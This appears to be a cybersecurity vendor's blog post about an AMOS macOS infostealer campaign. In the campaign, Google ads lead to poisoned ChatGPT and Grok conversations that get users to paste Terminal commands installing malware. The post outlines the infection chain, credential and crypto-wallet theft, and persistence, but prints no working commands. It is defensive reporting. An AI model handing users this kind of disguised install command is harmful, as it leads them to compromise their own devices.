A new campaign by the AMOS infostealer is exploiting Google search ads to redirect users to supposedly “helpful” guides hosted in public conversations on Grok and ChatGPT. Although they appear to offer legitimate solutions for macOS, these instructions lead users to execute commands that ultimately install the AMOS malware on their devices.
The activity was initially identified by Kaspersky researchers and later expanded upon in a technical analysis published by Huntress’s managed security team.
This method, known as ClickFix, is triggered when a potential victim searches for common macOS-related terms, such as maintenance questions, troubleshooting issues, or queries about Atlas, OpenAI’s AI browser for macOS. From there, attackers exploit users' trust in AI platforms and Google’s sponsored results to steer them toward downloading the malware.
At TecnetOne, we stay on top of these emerging malware campaigns to provide you with updated recommendations, best practices, and expert cybersecurity guidance, helping you keep your devices and data fully protected.
The malicious Google ad directs users straight to public conversations on ChatGPT and Grok, strategically crafted to carry out the attack. While hosted on legitimate language model platforms, these conversations contain manipulated instructions that unknowingly guide users to install malware on their devices.
Malicious ChatGPT and Grok conversations
During the analysis, researchers were able to reproduce these manipulated results using multiple variations of common searches such as “how to delete data on iMac,” “erase system data on iMac,” or “free up storage on Mac.” This confirms that it’s not an isolated incident, but rather a widespread poisoning campaign targeting typical macOS maintenance and troubleshooting queries.
When a user falls into the trap and executes the commands suggested by the AI conversation in the macOS Terminal, a Base64-encoded URL is decoded, launching a malicious bash script. This script displays a fake dialog box prompting the user to enter their system password, allowing the attacker to gain access and proceed with the malware installation.
Bash Script (Source: Huntress)
Once the user enters their password, the script verifies and stores it to perform actions with elevated privileges. This allows the attacker to download the AMOS infostealer and run it with root-level permissions, granting full control over the compromised system.
Read more: Shamos Malware: New Infostealer Targeting Mac Users
AMOS was first identified in April 2023 as a malware-as-a-service (MaaS) operation specifically targeting macOS systems. This model allows attackers to subscribe to the infostealer for a monthly fee of around $1,000, gaining access to a suite of advanced information-stealing tools.
Over time, AMOS has evolved. Earlier this year, it incorporated a backdoor module, enabling operators to remotely execute commands on compromised devices, log keystrokes, and deploy additional malicious payloads based on their objectives.
Once installed, AMOS hides in the /Users/$USER/ directory as an invisible file (named .helper). From there, it performs a system scan, paying particular attention to applications like Ledger Wallet and Trezor Suite.
If it detects these tools, it replaces them with trojanized versions designed to trick the victim into entering their seed phrase or recovery phrase under the guise of a supposed “security verification.”
Replacement of cryptocurrency wallet apps with trojanized versions
AMOS extends its reach beyond specific apps and also targets cryptocurrency wallets such as Electrum, Exodus, MetaMask, Ledger Live, Coinbase Wallet, and other similar solutions. Additionally, it extracts sensitive browser data, including cookies, stored passwords, autofill information, and session tokens.
The malware also attempts to access credentials stored in the macOS Keychain, such as app and Wi-Fi network passwords, along with local files that may contain valuable information for attackers.
To ensure persistence on the system, AMOS uses a LaunchDaemon (com.finder.helper.plist) that runs a hidden AppleScript functioning as a watchdog mechanism. This process automatically restarts the malware within a second if it is terminated, ensuring its continued presence.
The recent attacks using the ClickFix technique highlight how threat actors are continuously experimenting with new strategies to exploit legitimate and widely used platforms, including generative AI technologies like those from OpenAI and X.
In fact, a telling detail observed during testing is that when asking ChatGPT to validate the safety of these manipulated instructions, the model itself warns that they are unsafe to execute—demonstrating the importance of always verifying the legitimacy of such commands.
At TecnetOne, we strongly advise exercising caution in light of this new macOS malware campaign: avoid running commands found online or generated by AI without understanding what they do, always verify the legitimacy of links and ads before clicking, keep your operating system and apps up to date, use trusted security solutions that can detect infostealers like AMOS, and never share sensitive information such as your seed phrase.
If you’re ever in doubt, consult a cybersecurity expert to avoid compromising your device.